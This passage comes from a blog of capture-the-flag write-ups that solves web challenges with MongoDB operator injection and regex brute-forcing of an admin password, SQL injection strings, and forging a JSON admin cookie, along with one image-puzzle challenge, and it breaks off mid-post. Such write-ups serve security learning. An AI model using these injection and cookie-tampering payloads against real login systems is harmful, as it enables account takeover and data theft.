<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghzJ3tDoP8-voj9Nz7Lwy8Xk1tnFDF5xmp_848OhSB3q-T-yOVPFdgyst7EFOxm1qDG7r3k-iCR2mrtXl-WaZUm8gylH9LgpbxiAtvMt_LJ3RpLE0Src2V7c-lJsvq4mRqUcGVoTisU3Hh/s1600/3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="79" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghzJ3tDoP8-voj9Nz7Lwy8Xk1tnFDF5xmp_848OhSB3q-T-yOVPFdgyst7EFOxm1qDG7r3k-iCR2mrtXl-WaZUm8gylH9LgpbxiAtvMt_LJ3RpLE0Src2V7c-lJsvq4mRqUcGVoTisU3Hh/s320/3.PNG" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<b><span style="color: red;">Flag:</span> hitcon{hihihi, how 4re y0u today?}</b></div>
ICheer_No0Mhttp://www.blogger.com/profile/06070190416176409719noreply@blogger.com27tag:blogger.com,1999:blog-9154377361493966397.post-49419197873811205732016-09-05T11:32:00.001+07:002016-09-05T11:53:17.066+07:00MMA CTF 2nd 2016: Get the admin password! (Web) Write-up<b>Descriptions:</b><br />
<blockquote class="tr_bq">
<blockquote class="tr_bq">
Get the admin password!<br />
<a href="http://gap.chal.ctf.westerns.tokyo/">http://gap.chal.ctf.westerns.tokyo/</a><br />
<br />
You can use test:test</blockquote>
</blockquote>
<b>Solution: </b><br />
<br />
1. Try to inject in user/password field such as SQL Injection it not show more information.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgu6CNZwRNIo4EJJgEgOllMwhrmAYyQu2GV1Co4WRPqWpr8dBgcEnHpZ6RVd6AFPReqy14zJtCcKVcBk5wv80gA67fG8oaBWkeoo29FuGXvucdm5JT2X-nr7sK-x7YNJLnTKr0OnX1yXNzO/s1600/0.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="260" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgu6CNZwRNIo4EJJgEgOllMwhrmAYyQu2GV1Co4WRPqWpr8dBgcEnHpZ6RVd6AFPReqy14zJtCcKVcBk5wv80gA67fG8oaBWkeoo29FuGXvucdm5JT2X-nr7sK-x7YNJLnTKr0OnX1yXNzO/s320/0.PNG" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
2. Fuzzing via BurpSuite Pro with <b>Simple list: Fuzzing - SQL Injection </b>by <b>user=admin&password=</b><span style="color: red; font-weight: bold;">[Fuzz]</span>. and get some different length.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKVc2Ed5mP_mHCvdxRdOGMyCgxymhA6keNzJk7jWIgLwQqQB0v2AY9EBNZxo4kJbeifijsRyV3s1wWAKUHsN7uVwmEqgme36TIe6BBb7V5aqZyf65XImetAHbDH4Xb0R7RMvDan8skno0h/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="221" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKVc2Ed5mP_mHCvdxRdOGMyCgxymhA6keNzJk7jWIgLwQqQB0v2AY9EBNZxo4kJbeifijsRyV3s1wWAKUHsN7uVwmEqgme36TIe6BBb7V5aqZyf65XImetAHbDH4Xb0R7RMvDan8skno0h/s400/1.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
3. Using Google to search with keyword that we have and found the backend database is <b>MongoDB</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgriq1iowGQInnNA2eZBqq4OcU5MnIcRMDjd2IRJpFrxtRYMHlY3ggSHPOA_LpdSueseQueCK3Da7zKV5LbJ0QaGLLjYK8cbrVXiQtzx9RTPIzqs4NilHqBXFkun3NskdaToMYldVX3pLbj/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="292" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgriq1iowGQInnNA2eZBqq4OcU5MnIcRMDjd2IRJpFrxtRYMHlY3ggSHPOA_LpdSueseQueCK3Da7zKV5LbJ0QaGLLjYK8cbrVXiQtzx9RTPIzqs4NilHqBXFkun3NskdaToMYldVX3pLbj/s400/2.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
4. Try <a href="https://www.idontplaydarts.com/2010/07/mongodb-is-vulnerable-to-sql-injection-in-php-at-least/">MongoDB Injection</a> with <b>user=admin&password[$ne]=1</b>, and successfull to login as admin!</div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHwzxyWsgfPG3ZQPXkbIYFSa-RY-r4VKu3tLXEPH7M2q2_p0C8nflMLT_X5F6Ep2AibpXh2Jjq899IMBBdga2_3DEyICyZ8Lyou_KKn0NjdHsAplcT1Ub-h2kFbYKQhblwwbYJRyuly6We/s1600/3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="52" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHwzxyWsgfPG3ZQPXkbIYFSa-RY-r4VKu3tLXEPH7M2q2_p0C8nflMLT_X5F6Ep2AibpXh2Jjq899IMBBdga2_3DEyICyZ8Lyou_KKn0NjdHsAplcT1Ub-h2kFbYKQhblwwbYJRyuly6We/s400/3.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
5. This challenge need a admin password, I try <a href="https://docs.mongodb.com/manual/reference/operator/query/regex/">regex</a> operator to guess a admin's password like <b>user=admin&password[$regex]=^TWCTF{<span style="color: red;">[Fuzz]</span></b></div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7yfItYmcAjiqwLcjK_Vhl12V11Z6VQ952rhnrbAXXb6b8ULQJiBltwSEQVB53aD3uEndnT9wH7hdwXPmK5PbtAXxMNcPn1d5lZgAGivJv6D6mSe91_WCowVhTUBU5xVZDXtOPSrR69JUU/s1600/4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="333" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7yfItYmcAjiqwLcjK_Vhl12V11Z6VQ952rhnrbAXXb6b8ULQJiBltwSEQVB53aD3uEndnT9wH7hdwXPmK5PbtAXxMNcPn1d5lZgAGivJv6D6mSe91_WCowVhTUBU5xVZDXtOPSrR69JUU/s400/4.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
6. Set payload type Brute forcer with characte set in <b>$</b> <b>python -c "import string; print string.printable"</b>.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQUeP-ui4j70IuGNur_fjBwoWA7gJtPazEkglJrbw9tPjQBnSUgO-_EMdyEPnuPiPCN7NQEjHYgh0l1wFG-sMf6-yb3hIQUA_zhjQcys2vRDNKYaLBYcAZAyjLyughjhXoTBG2A0oz2AN3/s1600/5.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="275" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQUeP-ui4j70IuGNur_fjBwoWA7gJtPazEkglJrbw9tPjQBnSUgO-_EMdyEPnuPiPCN7NQEjHYgh0l1wFG-sMf6-yb3hIQUA_zhjQcys2vRDNKYaLBYcAZAyjLyughjhXoTBG2A0oz2AN3/s400/5.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
7. Set option <b>Grep - Extract</b> because if character is valid will return HTTP status code 302 Found to redirect to index page.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6AfLre23XCaF1ziFLR3poQGVWyIV2WwdRomD8D817zw58g_4CoHmmlP-j5hjAHF2cca3-m-MO2Myi59hGjJHJ-F3CmuicWf7jiyreX9BMqNGcWgAV3e-k-0Fzk_u-uDKguLwX-BseaWgw/s1600/6.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="147" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6AfLre23XCaF1ziFLR3poQGVWyIV2WwdRomD8D817zw58g_4CoHmmlP-j5hjAHF2cca3-m-MO2Myi59hGjJHJ-F3CmuicWf7jiyreX9BMqNGcWgAV3e-k-0Fzk_u-uDKguLwX-BseaWgw/s400/6.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
8. Start attack and found 1st character is "w" :)</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiB-dn9aGyjyCki79tMTRcOu7Hyjh69lFrOpKDw7lVivST9cWaFPVcbXnXmxC64NOySOlBbKlwpfT7IFscQ6z71NqqIv7srngT_EXzV5fzdeW4Y_trHQtWM1401mHzV1S_qIKcJTGmq8yhC/s1600/7.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="272" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiB-dn9aGyjyCki79tMTRcOu7Hyjh69lFrOpKDw7lVivST9cWaFPVcbXnXmxC64NOySOlBbKlwpfT7IFscQ6z71NqqIv7srngT_EXzV5fzdeW4Y_trHQtWM1401mHzV1S_qIKcJTGmq8yhC/s400/7.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
9. Fuzzing to find another character of admin's password.</div>
<br />
<div class="separator" style="clear: both;">
<b>Flag: </b><span style="color: red;"><b>TWCTF{wasshoi!summer_festival!}</b></span></div>
ICheer_No0Mhttp://www.blogger.com/profile/06070190416176409719noreply@blogger.com0tag:blogger.com,1999:blog-9154377361493966397.post-55188919835405140672016-09-05T11:32:00.000+07:002016-09-05T11:32:46.714+07:00MMA CTF 2nd 2016: glance (Misc) Write-up<b>Descriptions:</b><br />
<blockquote class="tr_bq">
<blockquote class="tr_bq">
I saw <a href="https://twctf7qygt6ujk.azureedge.net/uploads/glance.gif-994bd85cd3c2f37c1cd1d520a506abbbe459ac7dc2fedd39bf04c99a04abcb9f">this</a> through a gap of the door on a train.</blockquote>
</blockquote>
<b>Solution: </b><br />
<br />
1. Get a animation gif file and go to <a href="http://gifmaker.me/exploder/">http://gifmaker.me/exploder/</a> for split gif to frame.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrvCVFH2Y1GrouZFGk2Py6Zg9xEsQvAvpgckUBOEbPSC0EAd6JO8RsgEqdTiLNtFCaYAYv64PXGTsgzfBphdGzIho15dGkN0Aw3isrK1fWPnj_nMsd38TUc3wKFuWX0uHyUYmfSe9GERSg/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="261" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrvCVFH2Y1GrouZFGk2Py6Zg9xEsQvAvpgckUBOEbPSC0EAd6JO8RsgEqdTiLNtFCaYAYv64PXGTsgzfBphdGzIho15dGkN0Aw3isrK1fWPnj_nMsd38TUc3wKFuWX0uHyUYmfSe9GERSg/s320/1.PNG" width="320" /></a></div>
<br />
2. I want to concat all gif image and go to www.google.com, search and get some command that usefull. <a href="http://stackoverflow.com/questions/20737061/merge-images-side-by-sidehorizontally">http://stackoverflow.com/questions/20737061/merge-images-side-by-sidehorizontally</a><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirHRMmhe7wTifQ13hkkjBkCZNWX2tdWOzTmYg5yr_940DsIH_ZBSVjsUmIRh9ObzOsdqqHvFAO78zSlEC6fe0FQlDIKhHrtUz1AZWvSH2rpBwGRxoY-2BaM9a0E4YXzxBnSmCMmEdXAMSU/s1600/3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirHRMmhe7wTifQ13hkkjBkCZNWX2tdWOzTmYg5yr_940DsIH_ZBSVjsUmIRh9ObzOsdqqHvFAO78zSlEC6fe0FQlDIKhHrtUz1AZWvSH2rpBwGRxoY-2BaM9a0E4YXzxBnSmCMmEdXAMSU/s400/3.PNG" width="400" /></a></div>
<br />
3. <b>convert +append *.gif out.png</b><br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEit_SBGk2snpbyW1Fqux-RxAhBvTaO2hZvnJR6QP1qlk47HUt1mp1piZeDOmlaod3FhWVN82h8F9fTFgZIDwLFuvtDhwuef7_hzhwSy5Fy4S_sOdpOS7qHFhalKMyxVwjzq8B-G6rV71_6l/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEit_SBGk2snpbyW1Fqux-RxAhBvTaO2hZvnJR6QP1qlk47HUt1mp1piZeDOmlaod3FhWVN82h8F9fTFgZIDwLFuvtDhwuef7_hzhwSy5Fy4S_sOdpOS7qHFhalKMyxVwjzq8B-G6rV71_6l/s400/2.PNG" width="266" /></a></div>
<br />
<div class="separator" style="clear: both;">
<b>Flag: </b><span style="color: red;"><b>TWCTF{Bliss by Charles O'Rear}</b></span></div>
ICheer_No0Mhttp://www.blogger.com/profile/06070190416176409719noreply@blogger.com0tag:blogger.com,1999:blog-9154377361493966397.post-73414660161201780812016-05-16T05:30:00.001+07:002016-05-16T06:13:25.382+07:00TU CTF 2016: Duckprint (Web) Write-up<b>Descriptions:</b><br />
<blockquote class="tr_bq">
<blockquote class="tr_bq">
See if you can steal the admin's duck print and validate it!</blockquote>
<blockquote class="tr_bq">
When calculating the SHA, leave the periods in</blockquote>
<blockquote class="tr_bq">
http://130.211.242.26:31337</blockquote>
</blockquote>
<b>Solution: </b><br />
<b><br /></b>
1. This challenge have 3 pages (Register, Generate, Validate), The goal is calculate token and valid admin to get the flag.<br />
<br />
2. Register with username "ichz"<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-JWRdfmFNa2fR9qEV4JLcXrKypjVUTcJDeSxSZAfXRfbIW1C11S8UkqT4auxLXTkPk9Hb3iXQ3EiHEGpSZtXO8oj-iUgbrFTZjeC0GnWGG8SuUfw8zBbLfPdg-Yp9HMCwhkBupK5pSEAG/s1600/4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="173" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-JWRdfmFNa2fR9qEV4JLcXrKypjVUTcJDeSxSZAfXRfbIW1C11S8UkqT4auxLXTkPk9Hb3iXQ3EiHEGpSZtXO8oj-iUgbrFTZjeC0GnWGG8SuUfw8zBbLfPdg-Yp9HMCwhkBupK5pSEAG/s400/4.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
3. Try to generate token from my user, and see my username, admin status = 0, token, generated token.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgEUuXori6ZiJZk843UXFR_kWA-K_uYpv8fsz4YyquIR9XGkA9NMvsALZ5lOrP0F5BXFct7gkpamVFMUzP86maEYAbWZADTMxgRFLuL10rQ2hi0PPXBdei2YU5-1BkJ4qMRAQKAcwDlqEu/s1600/5.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="169" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgEUuXori6ZiJZk843UXFR_kWA-K_uYpv8fsz4YyquIR9XGkA9NMvsALZ5lOrP0F5BXFct7gkpamVFMUzP86maEYAbWZADTMxgRFLuL10rQ2hi0PPXBdei2YU5-1BkJ4qMRAQKAcwDlqEu/s400/5.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
4. Generated token format is <b>sha256(b64(username) + "." + b64(cookie) + "." + b64(token))</b>, Where is admin username and admin token?</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
5. View source of Generate page and found comment that tell me a SQL query statement on line 24, Yes it vulnerable to SQL Injection!</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJ8taiHRXsYsK4p0IiKHHK9wrYHYIyZiGcNVRpInUMdMkfGQBBzLjz4wDZypULtbNwf7pAsW5t9cOojfi6EYbtFelCvHcwIuUU5io_XIOk6OTOdidu4O30MW_uadB_5lDA4Sy1cf3WwWIh/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJ8taiHRXsYsK4p0IiKHHK9wrYHYIyZiGcNVRpInUMdMkfGQBBzLjz4wDZypULtbNwf7pAsW5t9cOojfi6EYbtFelCvHcwIuUU5io_XIOk6OTOdidu4O30MW_uadB_5lDA4Sy1cf3WwWIh/s1600/2.PNG" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
6. Try to insert a simple <b>' or '1'='1'-- -</b>, I get all registered user and one of Admin! (DuckDuckGoose), admin position = 1, token = d4rkw1ng</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwg-yvRYzj3QUN1ayqWjlgP8VJNX0P-AGHAIZeINDVi8QZAUAntdow9Uz5UlsXO_BXx00ECIDXm5HmZNRlwb5gP7IgNtmQiectTXoYwIE9hC1Dob-mLgHPR7tkvDci7NPiDhhiBu9059Zi/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="187" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwg-yvRYzj3QUN1ayqWjlgP8VJNX0P-AGHAIZeINDVi8QZAUAntdow9Uz5UlsXO_BXx00ECIDXm5HmZNRlwb5gP7IgNtmQiectTXoYwIE9hC1Dob-mLgHPR7tkvDci7NPiDhhiBu9059Zi/s400/1.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
7. Go to Validate page, and get some notice that not have permission to access it, Cannot access.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2F8aLJNEwKx5yOzYpq8QVASyRN3cnOpSYdM8LS-iYBnvzEKmMcpckoTwmx4kMPj7fnHNg2KmNYr-5uKKWviaGvD2kaoL8dOOFI8Ua6UPh8d3SJMHSBclVqZ5mvY00CFjOyzLdhBXXz_SS/s1600/6.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="258" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2F8aLJNEwKx5yOzYpq8QVASyRN3cnOpSYdM8LS-iYBnvzEKmMcpckoTwmx4kMPj7fnHNg2KmNYr-5uKKWviaGvD2kaoL8dOOFI8Ua6UPh8d3SJMHSBclVqZ5mvY00CFjOyzLdhBXXz_SS/s400/6.PNG" width="400" /></a></div>
8. In the cookies, I found <b>duck_cookie </b>is a JSON format and set to <b>%7B%22username%22%3A%22<span style="color: red;">ichz</span>%22%2C%22admin%22%3A<span style="color: red;">0</span>%7D%0A</b>, Try to change a cookie to <b>%7B%22username%22%3A%22<span style="color: red;">DuckDuckGoose</span>%22%2C%22admin%22%3A<span style="color: red;">1</span>%7D%0A</b><b> </b>by Web Developer Tool on Google Chrome and access this page again.<br />
<br />
9. Back to generated token format is <b>sha256(b64(username) + "." + b64(cookie) + "." + b64(token))</b>, Finally done I get a username, token from SQL Injection vulnerability.<br />
<br />
<b>- sha256(b64('DuckDuckGoose') + "." + b64('%7B%22username%22%3A%22DuckDuckGoose%22%2C%22admin%22%3A1%7D%0A') + "." + b64('d4rkw1ng'))</b><br />
<b><br /></b>
<b>- sha256('RHVja0R1Y2tHb29zZQ==.JTdCJTIydXNlcm5hbWUlMjIlM0ElMjJEdWNrRHVja0dvb3NlJTIyJTJDJTIyYWRtaW4lMjIlM0ExJTdE.ZDRya3cxbmc=')</b><br />
<b><br /></b>
<b>- sha256: 29fb251184e9eadb3eb7a1790ecd1dd945525b1f50b56b261e01d9e2429cbe8b</b><br />
<b><br /></b>
10. Access to Validate page and submit generated token to get a flag.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="color: black; margin-left: 1em; margin-right: 1em;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQ0k04oJQ1oPfr9B9hLZKm2nx1Hdsfnz00cJGbQaB16g8XiF227_38NyaUiX1hJB6uxcseTwsoZA2o8ecNpqKVrM5IR78ZB6D1i_KTbQhiSg7o4VnBbn-UVr0jVqDIxZ_qG2UOdwlWCADx/s1600/3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="202" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQ0k04oJQ1oPfr9B9hLZKm2nx1Hdsfnz00cJGbQaB16g8XiF227_38NyaUiX1hJB6uxcseTwsoZA2o8ecNpqKVrM5IR78ZB6D1i_KTbQhiSg7o4VnBbn-UVr0jVqDIxZ_qG2UOdwlWCADx/s400/3.PNG" width="400" /></a></span></div>
<div class="separator" style="clear: both; text-align: left;">
<b>Flag: <span style="color: red;">TUCTF{Quacky_McQuackerface}</span></b></div>
ICheer_No0Mhttp://www.blogger.com/profile/06070190416176409719noreply@blogger.com0tag:blogger.com,1999:blog-9154377361493966397.post-29093840380509131232016-05-16T05:30:00.000+07:002016-05-19T23:30:26.381+07:00TU CTF 2016: Student Grades (Web) Write-up<b>Descriptions:</b><br />
<blockquote class="tr_bq">
<blockquote class="tr_bq">
We are trying to find out what our grade was, but we don't seem to be in the database...</blockquote>
<blockquote class="tr_bq">
Can you help us out?</blockquote>
<blockquote class="tr_bq">
http://104.199.151.39/index.html</blockquote>
</blockquote>
<b>Solution: </b><br />
<b><br /></b>
1. "in the database..." on description make me sure, It about SQL Injection.<br />
<br />
2. Index page have a input of name that want to show grade.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8kKzWAoJTyzSbCbCzevwrunyf8u07tHL6G6WVClsTw51X_ts_YkMMxlAaw9OOlb4pHlzbwcGvB3ZL3EtxD9cJE1FVHfTpGW-BXhwdlLV-AQc5Lt9fmFPeNCEJI3_vhlnrjQZkHmh51_gQ/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="147" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8kKzWAoJTyzSbCbCzevwrunyf8u07tHL6G6WVClsTw51X_ts_YkMMxlAaw9OOlb4pHlzbwcGvB3ZL3EtxD9cJE1FVHfTpGW-BXhwdlLV-AQc5Lt9fmFPeNCEJI3_vhlnrjQZkHmh51_gQ/s400/1.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
3. View source in index.html and get some script.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJzLuQvsIBcp8pC6PStJrNSBvJQxZKhUTJezftOhn6qCHzOXMEUof-gYwALG5A4UQmWl95wFJFhBXj2_45FQlVUCEhCoVtEL8_QWIAxg2sGW-ffEUO0AmSpMTl8TeIAQsWy8hOBJPIRmKR/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="216" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJzLuQvsIBcp8pC6PStJrNSBvJQxZKhUTJezftOhn6qCHzOXMEUof-gYwALG5A4UQmWl95wFJFhBXj2_45FQlVUCEhCoVtEL8_QWIAxg2sGW-ffEUO0AmSpMTl8TeIAQsWy8hOBJPIRmKR/s400/2.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
4. In line 46 is vulnerable to SQL Injection but in line 50 means the data will send with md5 to postQuery.php by ajax.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAzXfD7ahr_RaFHGVZr6VzalI3_izxEuz4Zj1O9l9eQKGdCqhFZuG4y10zMYroGZeEMqKsi1y9M9bXt8uxp91r0-ht8NejM-eOvkTn6upopzFnDWiJ91hlbWwsatkpCprMRmnSfj69Plm2/s1600/3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="191" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAzXfD7ahr_RaFHGVZr6VzalI3_izxEuz4Zj1O9l9eQKGdCqhFZuG4y10zMYroGZeEMqKsi1y9M9bXt8uxp91r0-ht8NejM-eOvkTn6upopzFnDWiJ91hlbWwsatkpCprMRmnSfj69Plm2/s400/3.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
5. In Response tab, I found some comment that tell me a SQL query statement.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQQ-o44K-MQhQKUvFOYI4YjJx8eXIcHE-_aQh3Jli1wVrlIGvRXPxNGVDPWvC4fJmR-7Hnbrtwj0M2wsh_7fECApQShMZ2IWjI09eOJfkZ_5VX_ITjZ77GoswEfC50JQen7wGsYQ47UoJ2/s1600/4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="73" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQQ-o44K-MQhQKUvFOYI4YjJx8eXIcHE-_aQh3Jli1wVrlIGvRXPxNGVDPWvC4fJmR-7Hnbrtwj0M2wsh_7fECApQShMZ2IWjI09eOJfkZ_5VX_ITjZ77GoswEfC50JQen7wGsYQ47UoJ2/s400/4.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
6. Write a python script to get data in each step, Found Database: <b>tuctf</b>, Tables: <b>tuctf_grades, tuctf_info, tuctf_junk</b> Columns: <b>item, value</b> and Flag store in <b><span style="color: red;">tuctf_info</span></b>.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHZIpkNF9K5J9wuaPqOF2UQYEIwNAOZqcWvRq_Pg4uT01EjC6G_xzTeAcrqc2fgDilYTv4iHuxqWNKAQkEUKXB5wcnoQeLaJWcPJvyZonz8dkdohZGjD2v9-CewjK6Ts2jOdfmi3_AJzEH/s1600/10.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="90" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHZIpkNF9K5J9wuaPqOF2UQYEIwNAOZqcWvRq_Pg4uT01EjC6G_xzTeAcrqc2fgDilYTv4iHuxqWNKAQkEUKXB5wcnoQeLaJWcPJvyZonz8dkdohZGjD2v9-CewjK6Ts2jOdfmi3_AJzEH/s400/10.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
